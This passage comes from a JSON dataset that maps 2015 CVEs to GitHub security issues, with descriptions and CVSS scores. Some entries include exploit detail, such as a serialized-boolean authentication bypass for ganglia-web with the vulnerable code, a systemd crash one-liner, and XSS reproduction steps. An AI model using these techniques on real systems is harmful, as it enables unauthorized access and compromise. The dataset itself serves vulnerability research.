  269. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  270. "severity": "MEDIUM",
  271. "baseScore": 5.9,
  272. "impactScore": 3.6,
  273. "exploitabilityScore": 2.2
  274. },
  275. {
  276. "CVE_ID": "CVE-2015-2796",
  277. "Issue_Url_old": "https://github.com/Project-Pier/ProjectPier-Core/issues/37",
  278. "Issue_Url_new": "https://github.com/project-pier/projectpier-core/issues/37",
  279. "Repo_new": "project-pier/projectpier-core",
  280. "Issue_Created_At": "2015-03-31T14:18:33Z",
  281. "description": "Security Issue XSS CVETAG . An attacker can pass this URL (with XSS payload) to a victim (user of APITAG and can make the victim to perform some tasks or can infect the user. The vulnerability is XSS URLTAG The search_for parameter is not getting sanitized. You can use CVETAG cve id in your announcements when you fix this vulnerability. Thanks, Jaydeep",
  282. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  283. "severity": "MEDIUM",
  284. "baseScore": 6.1,
  285. "impactScore": 2.7,
  286. "exploitabilityScore": 2.8
  287. },
  288. {
  289. "CVE_ID": "CVE-2015-2912",
  290. "Issue_Url_old": "https://github.com/orientechnologies/orientdb/issues/4824",
  291. "Issue_Url_new": "https://github.com/orientechnologies/orientdb/issues/4824",
  292. "Repo_new": "orientechnologies/orientdb",
  293. "Issue_Created_At": "2015-08-19T21:38:03Z",
  294. "description": "Cross Site Request Forgery. The APITAG Server allows the usage of a parameter for the name of a callback function in http requests. If such a parameter is used in a http request the server sends the http response to the function which is specified in the parameter. This can be used to construct a malicious webpage which sends a get request to the APITAG server in order to get some content. An attacker can read the http response, because of the allowed callback function parameter. The APITAG server provides an interface to request specific entries of a database with the http method GET. For example the URL URLTAG response with JSON data of the record NUMBERTAG In the case of record NUMBERTAG its the information about the reader account with the hashed password. CODETAG",
  295. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  296. "severity": "HIGH",
  297. "baseScore": 8.8,
  298. "impactScore": 5.9,
  299. "exploitabilityScore": 2.8
  300. },
  301. {
  302. "CVE_ID": "CVE-2015-3138",
  303. "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpdump/issues/446",
  304. "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpdump/issues/446",
  305. "Repo_new": "the-tcpdump-group/tcpdump",
  306. "Issue_Created_At": "2015-03-25T18:10:04Z",
  307. "description": "Possible heap overflows reading pcap. Hello, In learning how to use american fuzzy lop, I decided to make libpcap/tcpdump my first fuzzing foray. I was able to find two possible heap overflows in print wb.c (lines NUMBERTAG and NUMBERTAG Loading tcpdump NUMBERTAG in gdb and running the two testcases that consistently segfault: gdb PATHTAG CODETAG And... CODETAG What would be the best way to get the testcases to you that cause the crashes? Thanks!",
  308. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  309. "severity": "HIGH",
  310. "baseScore": 7.5,
  311. "impactScore": 3.6,
  312. "exploitabilityScore": 3.9
  313. },
  314. {
  315. "CVE_ID": "CVE-2015-3172",
  316. "Issue_Url_old": "https://github.com/jkk/eidogo/issues/27",
  317. "Issue_Url_new": "https://github.com/jkk/eidogo/issues/27",
  318. "Repo_new": "jkk/eidogo",
  319. "Issue_Created_At": "2015-06-14T20:15:36Z",
  320. "description": "XSS Security Vulnerability. APITAG is susceptible to Cross Site Scripting (XSS) attacks via maliciously crafted SGF input. There are actually two separate XSS vulnerabilities NUMBERTAG Text from comments and game info are unsafely added into the DOM directly via APITAG NUMBERTAG Any file loaded from URL that begins with a left curly bracket \"{\" is assumed to be JSON and unsafely parsed with eval. Here are examples exploiting each vulnerability: URLTAG URLTAG A patch attempting to mitigate these security vulnerabilities was submitted in this pull request: URLTAG See this pull request for more discussion of the changes. Note that the pull request does not include an updated minified file. However, a minified file incorporating this patch has been prepared by the OGS developers and is available here: FILETAG Compare with: FILETAG The identifier \" CVETAG \" has been assigned to refer to this issue. Disclosure timeline: April NUMBERTAG Developer privately notified of security vulnerability April NUMBERTAG Developer acknowledged notification May NUMBERTAG Pull request submitted May NUMBERTAG Several webmasters notified in advance June NUMBERTAG Public disclosure",
  321. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  322. "severity": "MEDIUM",
  323. "baseScore": 5.4,
  324. "impactScore": 2.7,
  325. "exploitabilityScore": 2.3
  326. },
  327. {
  328. "CVE_ID": "CVE-2015-3400",
  329. "Issue_Url_old": "https://github.com/zfsonlinux/zfs/issues/3319",
  330. "Issue_Url_new": "https://github.com/openzfs/zfs/issues/3319",
  331. "Repo_new": "openzfs/zfs",
  332. "Issue_Created_At": "2015-04-19T16:15:47Z",
  333. "description": "security issue: sharenfs always gives read access for world. Since NUMBERTAG sharenfs always gives read access to everyone. root APITAG zfs set APITAG PATHTAG root APITAG grep test_nfs PATHTAG PATHTAG APITAG PATHTAG APITAG root APITAG zfs set APITAG PATHTAG root APITAG grep test_nfs PATHTAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG",
  334. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  335. "severity": "MEDIUM",
  336. "baseScore": 4.3,
  337. "impactScore": 1.4,
  338. "exploitabilityScore": 2.8
  339. },
  340. {
  341. "CVE_ID": "CVE-2015-3886",
  342. "Issue_Url_old": "https://github.com/gobby/gobby/issues/61",
  343. "Issue_Url_new": "https://github.com/gobby/gobby/issues/61",
  344. "Repo_new": "gobby/gobby",
  345. "Issue_Created_At": "2015-05-06T22:05:38Z",
  346. "description": "Gobby seems to silently accept expired certificates. Debian bug NUMBERTAG CVETAG reported that gobby silently accepts expired certificates. The mentioned site has since been fixed and I'm unsure if that'd be due to pinning or if there's a genuine validation error. APITAG then the function in libinfinity doesn't seem to tolerate expiry not even with pinning AFAICS.) The report in full: > At the moment the certificate of APITAG is expired (reported > separately as Bug NUMBERTAG but Jessie's gobby happily establishes a full > connection to it without any warning. This is a regression since Wheezy, > since it's not the case in gobby NUMBERTAG ersion NUMBERTAG which shows a > warning stating that the certificate has expired with the option to > accept it any way. > > It's strange (and perhaps relevant), but if one configures an empty file > as the APITAG CAs\" file in Jessie's gobby's security options, then > it lists the connection with a \"certificate expired\" error next to it in > the Document Browser pane. However, no prompt is shown, so it's not > possible to manually accept the expired certificate.",
  347. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  348. "severity": "CRITICAL",
  349. "baseScore": 9.8,
  350. "impactScore": 5.9,
  351. "exploitabilityScore": 3.9
  352. },
  353. {
  354. "CVE_ID": "CVE-2015-3887",
  355. "Issue_Url_old": "https://github.com/rofl0r/proxychains-ng/issues/60",
  356. "Issue_Url_new": "https://github.com/rofl0r/proxychains-ng/issues/60",
  357. "Repo_new": "rofl0r/proxychains-ng",
  358. "Issue_Created_At": "2015-05-13T23:10:26Z",
  359. "description": "CVETAG RPATH flaw. URLTAG This line loads libproxychains4.so from the current directory which can be used by the attacker to load a manipulated library instead of original libproxychains4.so ref: CVETAG URLTAG URLTAG",
  360. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  361. "severity": "HIGH",
  362. "baseScore": 7.8,
  363. "impactScore": 5.9,
  364. "exploitabilityScore": 1.8
  365. },
  366. {
  367. "CVE_ID": "CVE-2015-4082",
  368. "Issue_Url_old": "https://github.com/jborg/attic/issues/271",
  369. "Issue_Url_new": "https://github.com/jborg/attic/issues/271",
  370. "Repo_new": "jborg/attic",
  371. "Issue_Created_At": "2015-04-05T11:10:31Z",
  372. "description": "potential decryption attack. assume attacker has access to your (still) encrypted repository and changes the manifest type byte to \"unencrypted / without key file\". your next automated backup will then run in unencrypted mode without you noticing it and you give all your data to the attacker who controls your backup device.",
  373. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  374. "severity": "MEDIUM",
  375. "baseScore": 6.5,
  376. "impactScore": 3.6,
  377. "exploitabilityScore": 2.8
  378. },
  379. {
  380. "CVE_ID": "CVE-2015-4627",
  381. "Issue_Url_old": "https://github.com/delta/pragyan/issues/207",
  382. "Issue_Url_new": "https://github.com/delta/pragyan/issues/207",
  383. "Repo_new": "delta/pragyan",
  384. "Issue_Created_At": "2015-06-17T03:57:25Z",
  385. "description": "SQL injection vulnerability in Lastest version Pragyan CMS NUMBERTAG Dear developer team. We are a information security team from QIHU NUMBERTAG company, China. We found a SQL injection vulnerability in lastest version Pragyan CMS NUMBERTAG and already sent you the technical details to EMAILTAG . Thank you APITAG info] name: APITAG company: QIHU NUMBERTAG company, China email: g sec EMAILTAG",
  386. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  387. "severity": "CRITICAL",
  388. "baseScore": 9.8,
  389. "impactScore": 5.9,
  390. "exploitabilityScore": 3.9
  391. },
  392. {
  393. "CVE_ID": "CVE-2015-5060",
  394. "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/875",
  395. "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/875",
  396. "Repo_new": "anchorcms/anchor-cms",
  397. "Issue_Created_At": "2015-06-24T17:43:45Z",
  398. "description": "DOM Based XSS attack through Search option. Hello all, The search option of the anchor CMS is properly escaped but an attacker can directly inject an XSS payload on the URL and it will execute properly. This happens in the most recent version of anchor CMS available to download from the FILETAG i.e.version NUMBERTAG The simple payload looks like this: URLTAG FILETAG",
  399. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  400. "severity": "MEDIUM",
  401. "baseScore": 6.1,
  402. "impactScore": 2.7,
  403. "exploitabilityScore": 2.8
  404. },
  405. {
  406. "CVE_ID": "CVE-2015-5237",
  407. "Issue_Url_old": "https://github.com/google/protobuf/issues/760",
  408. "Issue_Url_new": "https://github.com/protocolbuffers/protobuf/issues/760",
  409. "Repo_new": "protocolbuffers/protobuf",
  410. "Issue_Created_At": "2015-08-27T08:52:31Z",
  411. "description": "CVETAG : Integer overflow in serialization. int is used to express the size of serialized messages. If the size exceeds NUMBERTAG APITAG the application may allocate a buffer which is too small, or protobuf itself does this, in APITAG . It has been suggested that serialization of messages larger than NUMBERTAG APITAG is unsupported. But there is no good way for an application to ensure that the limit is not exceeded accidentally, without imposing rather draconian limits. To some degree, this is an gets style interface. Right now, this is more or less harmless because the message sizes involved are substantial. But this will change over time. My worry is that it will be difficult to fix this because some of the overflowing computations end up in generated APITAG files, so the eventual fix will not be a simple library update.",
  412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  413. "severity": "HIGH",
  414. "baseScore": 8.8,
  415. "impactScore": 5.9,
  416. "exploitabilityScore": 2.8
  417. },
  418. {
  419. "CVE_ID": "CVE-2015-5521",
  420. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/408",
  421. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/408",
  422. "Repo_new": "blackcatdevelopment/blackcatcms",
  423. "Issue_Created_At": "2021-04-19T19:03:53Z",
  424. "description": "XSS Vulnerability on Modify Group Page. Summary An authenticated malicious user can take advantage of a XSS vulnerability in the APITAG Group\" feature in Admin Steps to Reproduce: Login into the Admin panel Go to PATHTAG Add group with name '\"> APITAG APITAG ' Save group. Impact Cookie Stealing A malicious user can steal cookies and use them to gain access to the application. Arbitrary requests An attacker can use XSS to send requests that appear to be from the victim to the web server. Malware download XSS can prompt the user to download malware. Since the prompt looks like a legitimate request from the site, the user may be more likely to trust the request and actually install the malware. Defacement attacker can deface the website using javascript code.",
  425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  426. "severity": "MEDIUM",
  427. "baseScore": 4.8,
  428. "impactScore": 2.7,
  429. "exploitabilityScore": 1.7
  430. },
  431. {
  432. "CVE_ID": "CVE-2015-5947",
  433. "Issue_Url_old": "https://github.com/salesagility/SuiteCRM/issues/333",
  434. "Issue_Url_new": "https://github.com/salesagility/suitecrm/issues/333",
  435. "Repo_new": "salesagility/suitecrm",
  436. "Issue_Created_At": "2015-08-05T19:30:34Z",
  437. "description": "Post Auth RCE Not Fixed, its now a race condition :). The Post Auth RCE allegedly \"fixed\" in Commit b1b3fd6 URLTAG is not fixed. The fix simply makes the bug slightly harder to exploit, turning it from a straight shot file upload bug into a lovely race condition. Also, I bypassed the blacklist again :) Video Proof below, a APITAG will be published along with a full writeup of the vulnerability in due course, and a CVE will be requested from MITRE. ![IMAGE ALT TEXT HERE URLTAG Suggested fix: Validate images BEFORE writing to disc. Writing them to disc, then checking them, is a bad idea.",
  438. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  439. "severity": "HIGH",
  440. "baseScore": 8.1,
  441. "impactScore": 5.9,
  442. "exploitabilityScore": 2.2
  443. },
  444. {
  445. "CVE_ID": "CVE-2015-6250",
  446. "Issue_Url_old": "https://github.com/claviska/simple-php-captcha/issues/16",
  447. "Issue_Url_new": "https://github.com/yasirmturk/simple-php-captcha/issues/16",
  448. "Repo_new": "yasirmturk/simple-php-captcha",
  449. "Issue_Created_At": "2015-07-30T23:02:28Z",
  450. "description": "Captcha bypass vulnerability. The FILETAG file has a vulnerability enabling a client to generate the captcha response automatically, effectively bypassing the captcha. Since APITAG is used both in the initial seed for the captcha and in the captcha url path sent to the client, it is possible to generate the captcha result automatically by running the same code client side. I can share a proof of concept privately if you need it. Just let me know how to reach you.",
  451. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  452. "severity": "MEDIUM",
  453. "baseScore": 5.3,
  454. "impactScore": 1.4,
  455. "exploitabilityScore": 3.9
  456. },
  457. {
  458. "CVE_ID": "CVE-2015-6521",
  459. "Issue_Url_old": "https://github.com/atutor/ATutor/issues/103",
  460. "Issue_Url_new": "https://github.com/atutor/atutor/issues/103",
  461. "Repo_new": "atutor/atutor",
  462. "Issue_Created_At": "2015-08-11T16:05:23Z",
  463. "description": "Persistent cross site scripting and file upload attacks possible in course management. Persistent cross site scripting and file upload attacks possible in course management Course management is lacking input validation in many places that allows stored XSS attacks and malicious file upload. Following are the vulnerable regions NUMBERTAG Create course: The course name is not validated that allows to inject a javascript query into the name field. Steps to reproduce: Instructor A creates a course with a script in course name as follows: APITAG APITAG Another script in banner. APITAG APITAG Login as admin. When you click on courses, the APITAG pops up. Every time the course profile is checked by the student, the APITAG also pops up. Severity is high as admin could be attacked NUMBERTAG File Upload in course There are illegal file extensions mentioned where all the executable files are checked. But a file without any extension is accepted. This could be a binary executable file. Filename It is possible to mount a javascript into this variable. Filename is not validated. File content An attacker can write a malicious script into the file content and upload. Steps to reproduce: Instructor A goes to his course and then go to file storage. Clicks on create a new file. The file name is given as : APITAG APITAG The file content is given as APITAG APITAG Now a APITAG logs in. As soon as a page displaying file name comes, the script APITAG gets popped up even without clicking on it. If the content is downloaded, the alert APITAG pops up. This is of very high severity as this allows an instructor to post a virus as a file upload. Every student gets attacked. Even the administrator while accessing the course get attacked if the attack is mounted. Solution: Against XSS: Input validation using APITAG Against file upload: Use a whitelist of extensions that are allowed to be uploaded rather than extensions that are not allowed.",
  464. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  465. "severity": "MEDIUM",
  466. "baseScore": 5.4,
  467. "impactScore": 2.7,
  468. "exploitabilityScore": 2.3
  469. },
  470. {
  471. "CVE_ID": "CVE-2015-6567",
  472. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/625",
  473. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/625",
  474. "Repo_new": "wolfcms/wolfcms",
  475. "Issue_Created_At": "2015-05-05T09:58:54Z",
  476. "description": "Security Issue: Unrestricted File Upload. Hello There Wolf CMS ! Greetings from Bhati. While looking at your CMS version NUMBERTAG I found that an authenticated user can upload an arbitrary malicious file to the server, which allows them to take over the web server (e.g. command execution, so the user can act as the server admin). Looking forward to your response so I can share the details with you! It would be better if we discuss this by email so the information is not disclosed here.",
  477. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  478. "severity": "HIGH",
  479. "baseScore": 8.8,
  480. "impactScore": 5.9,
  481. "exploitabilityScore": 2.8
  482. },
  483. {
  484. "CVE_ID": "CVE-2015-6816",
  485. "Issue_Url_old": "https://github.com/ganglia/ganglia-web/issues/267",
  486. "Issue_Url_new": "https://github.com/ganglia/ganglia-web/issues/267",
  487. "Repo_new": "ganglia/ganglia-web",
  488. "Issue_Created_At": "2015-09-04T17:31:37Z",
  489. "description": "APITAG auth bypass. It's easy to bypass auth by serializing a boolean in place of the token, like this: $ php -r \"echo APITAG 'group'=>'admin', 'token'=>true)));\" The check compares the expected token to the cookie value with PHP's loose == operator, and true == any non-empty string, so a serialized true passes for whatever group the attacker names (here admin). Vulnerable code listed below: URLTAG APITAG { $cookie = $_COOKIE['ganglia_auth']; // magic quotes will break unserialization if($this APITAG { $cookie = stripslashes($cookie); } $data = unserialize($cookie); if(array_keys($data) != APITAG { return false; } if($this APITAG == $data['token']) { // Found by APITAG // Exploit: curl -H APITAG APITAG URLTAG Fix: check is_string() and compare with a strict, constant-time comparison (hash_equals), and do not unserialize() attacker-controlled cookie data at all; use a signed token or json_decode instead.",
  490. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  491. "severity": "CRITICAL",
  492. "baseScore": 9.8,
  493. "impactScore": 5.9,
  494. "exploitabilityScore": 3.9
  495. },
  496. {
  497. "CVE_ID": "CVE-2015-6817",
  498. "Issue_Url_old": "https://github.com/pgbouncer/pgbouncer/issues/69",
  499. "Issue_Url_new": "https://github.com/pgbouncer/pgbouncer/issues/69",
  500. "Repo_new": "pgbouncer/pgbouncer",
  501. "Issue_Created_At": "2015-09-01T20:07:28Z",
  502. "description": "A failed auth_query lookup leads to connection as auth_user!. Per mailing list report ( URLTAG use of auth_user and auth_query works fine, until an invalid user is entered, in which case the login falls back to the auth_user. I traced this back to a problem in client.c, inside handle_auth_response. When we find a match from the query and parse it by seeing a 'D' (data row) packet, we set client->auth_user to the new entry. However, if no 'D' is seen, and we skip straight to 'C' and 'Z', the code treats the lack of a client->auth_user as an indication that the above failed. This is not true, however, as auth_user is already set (to the config auth_user value). Thus, getting no rows back from the auth_query lets one log in as the powerful auth_user user. The fix must record explicitly whether a 'D' packet arrived (rather than inferring it from auth_user being unset) and reject the login when the query returns no rows. Patch coming soon.",
  503. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  504. "severity": "HIGH",
  505. "baseScore": 8.1,
  506. "impactScore": 5.9,
  507. "exploitabilityScore": 2.2
  508. },
  509. {
  510. "CVE_ID": "CVE-2015-6961",
  511. "Issue_Url_old": "https://github.com/web2py/web2py/issues/731",
  512. "Issue_Url_new": "https://github.com/web2py/web2py/issues/731",
  513. "Repo_new": "web2py/web2py",
  514. "Issue_Created_At": "2015-01-26T21:11:01Z",
  515. "description": "Open Redirection Vulnerability. APITAG FILETAG on October NUMBERTAG Issue Open Redirection TO Any Domain Dependency For Successful Redirection We Need Administration Password Only Unauthenticated Users Are Affected , If a user is already authenticated on web2py then he will not get redirected , Apart from this , Users who are not authenticated like APITAG Users\" Will get redirected successfully\" Severity Medium ( According To Me ) =D Correct me if i am wrong Tested On Web2py Tester Version From Official Site Reported By Narendra Bhati APITAG Here i have tested this issue on Tested version provided by Web2py Official Site What steps will reproduce the problem NUMBERTAG FILETAG ( successful redirection tested on APITAG Version Of Web2py Latest Version NUMBERTAG Replace the password parameter value with your administration password NUMBERTAG After replacing the valid password enter any domain and you will get redirected What is the expected output? What do you see instead? What version of the product are you using? On what operating system? Please provide any additional information below. APITAG issue: URLTAG",
  516. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  517. "severity": "MEDIUM",
  518. "baseScore": 6.1,
  519. "impactScore": 2.7,
  520. "exploitabilityScore": 2.8
  521. },
  522. {
  523. "CVE_ID": "CVE-2015-7225",
  524. "Issue_Url_old": "https://github.com/tinfoil/devise-two-factor/issues/45",
  525. "Issue_Url_new": "https://github.com/tinfoil/devise-two-factor/issues/45",
  526. "Repo_new": "tinfoil/devise-two-factor",
  527. "Issue_Created_At": "2015-09-10T12:40:07Z",
  528. "description": "Security Bug. Hi, Can you take a look at CVETAG ?",
  529. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  530. "severity": "MEDIUM",
  531. "baseScore": 5.3,
  532. "impactScore": 3.6,
  533. "exploitabilityScore": 1.6
  534. },
  535. {
  536. "CVE_ID": "CVE-2015-7294",
  537. "Issue_Url_old": "https://github.com/vesse/node-ldapauth-fork/issues/21",
  538. "Issue_Url_new": "https://github.com/vesse/node-ldapauth-fork/issues/21",
  539. "Repo_new": "vesse/node-ldapauth-fork",
  540. "Issue_Created_At": "2015-05-22T02:14:37Z",
  541. "description": "Vulnerable to LDAP injection. The username is not escaped as the LDAP specification requires (filter metacharacters such as *, (, ) and NUL must be encoded before the value is placed into a search filter), so the code appears to be vulnerable to LDAP injection: URLTAG",
  542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  543. "severity": "HIGH",
  544. "baseScore": 7.5,
  545. "impactScore": 3.6,
  546. "exploitabilityScore": 3.9
  547. },
  548. {
  549. "CVE_ID": "CVE-2015-7384",
  550. "Issue_Url_old": "https://github.com/nodejs/node/issues/3138",
  551. "Issue_Url_new": "https://github.com/nodejs/node/issues/3138",
  552. "Repo_new": "nodejs/node",
  553. "Issue_Created_At": "2015-09-30T22:42:05Z",
  554. "description": "CVETAG Denial of Service Vulnerability. APITAG posted @ APITAG _ Description and CVSS Score A bug exists in FILETAG versions NUMBERTAG to NUMBERTAG whereby an external attacker can cause a denial of service. The severity of this issue is high (see CVSS scoring below) and users of the affected versions should plan to upgrade when a fix is made available. Versions NUMBERTAG and NUMBERTAG of FILETAG are not affected . Versions NUMBERTAG and NUMBERTAG of FILETAG are vulnerable . Versions NUMBERTAG and NUMBERTAG of FILETAG are not affected but remain unsupported and users of these versions are encouraged to migrate to FILETAG NUMBERTAG at their earliest convenience. Version NUMBERTAG of FILETAG is vulnerable and while FILETAG NUMBERTAG is unsupported, a patch release with a fix will be made available some time next week. Users of FILETAG NUMBERTAG are encouraged to migrate to FILETAG NUMBERTAG as a matter of priority. Full details of this vulnerability are embargoed until a new NUMBERTAG release is made available on Monday the NUMBERTAG th of October NUMBERTAG UTC. Common Vulnerability Scoring System (CVSS NUMBERTAG Base Score: | Metric | Score | | | | | Base Score NUMBERTAG APITAG | | Base Vector: | PATHTAG URLTAG | Attack Vector: | Network (AV:N) | | Attack Complexity: | Medium (AC:H) | | Privileges Required: | None (PR:N) | | User Interaction: | None (UI:N) | | Scope of Impact: | Unchanged (S:U) | | Confidentiality Impact: | None (C:N) | | Integrity Impact: | None (I:N) | | Availability Impact: | High (A:H) | Complete CVSS NUMBERTAG ector: PATHTAG URLTAG . Refer to the CVSS NUMBERTAG Specification URLTAG for details on the meanings and application of the vector components. CVETAG is listed on the MITRE CVE dictionary CVETAG and NIST NVD URLTAG . 
Action and updates A new NUMBERTAG release on Monday the NUMBERTAG th of October NUMBERTAG will be made available with appropriate fixes for this vulnerability along with disclosure of the details of the bug to allow for complete impact assessment by users. A new FILETAG NUMBERTAG release will be made on or after Monday the NUMBERTAG th of October NUMBERTAG for users having trouble migrating to FILETAG NUMBERTAG however this release does not indicate continued official support of FILETAG release lines. Contact and future updates Please contact EMAILTAG rg if you wish to report a vulnerability in FILETAG . Please subscribe to the low volume announcement only nodejs sec mailing list at URLTAG to stay up to date with security vulnerabilities in FILETAG and the projects maintained in the nodejs APITAG organisation URLTAG .",
  555. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  556. "severity": "HIGH",
  557. "baseScore": 7.5,
  558. "impactScore": 3.6,
  559. "exploitabilityScore": 3.9
  560. },
  561. {
  562. "CVE_ID": "CVE-2015-7510",
  563. "Issue_Url_old": "https://github.com/systemd/systemd/issues/2002",
  564. "Issue_Url_new": "https://github.com/systemd/systemd/issues/2002",
  565. "Repo_new": "systemd/systemd",
  566. "Issue_Created_At": "2015-11-23T18:16:34Z",
  567. "description": "Stack overflows in nss_mymachines ( CVETAG ). The getpwnam and getgrnam implementations in APITAG have stack overflows due to an unconstrained alloca call (hidden behind strndupa ): the caller-supplied lookup name is copied onto the stack with no upper bound on its length, so a sufficiently long name exhausts the stack. Example for getpwnam : [fweimer MENTIONTAG ~]$ grep mymachines APITAG passwd: files sss mymachines group: files sss mymachines hosts: files dns myhostname mymachines [fweimer MENTIONTAG ~]$ python3 -c \"import pwd; APITAG NUMBERTAG Segmentation fault (core dumped) This has been assigned CVETAG for tracking purposes.",
  568. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  569. "severity": "CRITICAL",
  570. "baseScore": 9.8,
  571. "impactScore": 5.9,
  572. "exploitabilityScore": 3.9
  573. },
  574. {
  575. "CVE_ID": "CVE-2015-7529",
  576. "Issue_Url_old": "https://github.com/sosreport/sos/issues/696",
  577. "Issue_Url_new": "https://github.com/sosreport/sos/issues/696",
  578. "Repo_new": "sosreport/sos",
  579. "Issue_Created_At": "2015-12-04T16:25:23Z",
  580. "description": "CVETAG predictable tmp files usage. Mateusz Guzik reports that sos NUMBERTAG is vulnerable to symbolic link attacks since it uses predictable temporary file names in the configured APITAG location. If this location is shared with other users (the default on most distributions) then it is possible for a malicious user to obtain content from the archive and in some circumstances to execute arbitrary commands with administrative privileges. There are two recommended mitigations for these attacks: Use a private temporary directory (all versions, all kernels) Instead of using the default system temporary directory ( APITAG , APITAG ) use a private directory that excludes non administrative users from searching or reading the directory contents, e.g.: APITAG Note that the chmod is not strictly necessary assuming the root user's umask is set appropriately. Enable kernel link protection (partial mitigation, requires kernel support) Recent kernels support the APITAG feature that can be used to mitigate this class of attack and this is enable by default by most distributions that support the feature: ERRORTAG Note that relying on the APITAG feature does not entirely eliminate risk: an attacker could create a regular file that they own (in place of the output file sos expects to create) and use this to obtain archive content that would not normally be exposed to their user and group ID. Users of sosreport are recommended to use an alternate APITAG setting whenever possible. A fix for this problem is currently in master and will be included in the next sos release. This may be backported to earlier releases carried by distributions. Concerned users should contact their distribution's normal support channels for information regarding updated packages to fix this flaw.",
  581. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  582. "severity": "HIGH",
  583. "baseScore": 7.8,
  584. "impactScore": 5.9,
  585. "exploitabilityScore": 1.8
  586. },
  587. {
  588. "CVE_ID": "CVE-2015-7764",
  589. "Issue_Url_old": "https://github.com/Netflix/lemur/issues/117",
  590. "Issue_Url_new": "https://github.com/netflix/lemur/issues/117",
  591. "Repo_new": "netflix/lemur",
  592. "Issue_Created_At": "2015-10-06T20:52:39Z",
  593. "description": "Certificates encrypted with static IV. The IV is static per key at least. Lemur is using sqlalchemy_utils to encrypt certificates. This in turn encrypts with AES in CBC mode. URLTAG Given a single key, it will use the SHA NUMBERTAG hash of that key for all encryption. It looks like it will use the first NUMBERTAG bytes of that hash as the IV for each operation. A fixed IV defeats the purpose of CBC: encryption becomes deterministic, so identical plaintexts (and identical leading blocks of different plaintexts) produce identical ciphertext, which leaks equality and shared-prefix relationships between the stored certificates to anyone who can read the database. The IV should be a fresh random value for every encryption, stored alongside the ciphertext. I wanted to get your thoughts on it since setting up Lemur is my primary concern at the moment. Unless there's something I'm missing, I'll report it upstream as well.",
  594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  595. "severity": "HIGH",
  596. "baseScore": 7.5,
  597. "impactScore": 3.6,
  598. "exploitabilityScore": 3.9
  599. },
  600. {
  601. "CVE_ID": "CVE-2015-7764",
  602. "Issue_Url_old": "https://github.com/kvesteri/sqlalchemy-utils/issues/166",
  603. "Issue_Url_new": "https://github.com/kvesteri/sqlalchemy-utils/issues/166",
  604. "Repo_new": "kvesteri/sqlalchemy-utils",
  605. "Issue_Created_At": "2015-10-06T20:56:40Z",
  606. "description": "APITAG uses static IV per key. APITAG uses AES in CBC mode. The IV that it uses is not random though. URLTAG Given a single key, it will use the SHA NUMBERTAG hash of that key for all encryption. It looks like it will use the first NUMBERTAG bytes of that hash as the IV for each operation. Reusing one IV for every message under the same key makes CBC deterministic: equal plaintexts, and equal leading blocks of different plaintexts, encrypt to equal ciphertext, so an attacker who can read the stored values can detect repeated or shared-prefix data. CBC requires an unpredictable, per-message IV that is stored with the ciphertext. This link is a good primer on why this is bad: URLTAG",
  607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  608. "severity": "HIGH",
  609. "baseScore": 7.5,
  610. "impactScore": 3.6,
  611. "exploitabilityScore": 3.9
  612. },
  613. {
  614. "CVE_ID": "CVE-2015-8026",
  615. "Issue_Url_old": "https://github.com/relan/exfat/issues/5",
  616. "Issue_Url_new": "https://github.com/relan/exfat/issues/5",
  617. "Repo_new": "relan/exfat",
  618. "Issue_Created_At": "2015-09-09T09:09:36Z",
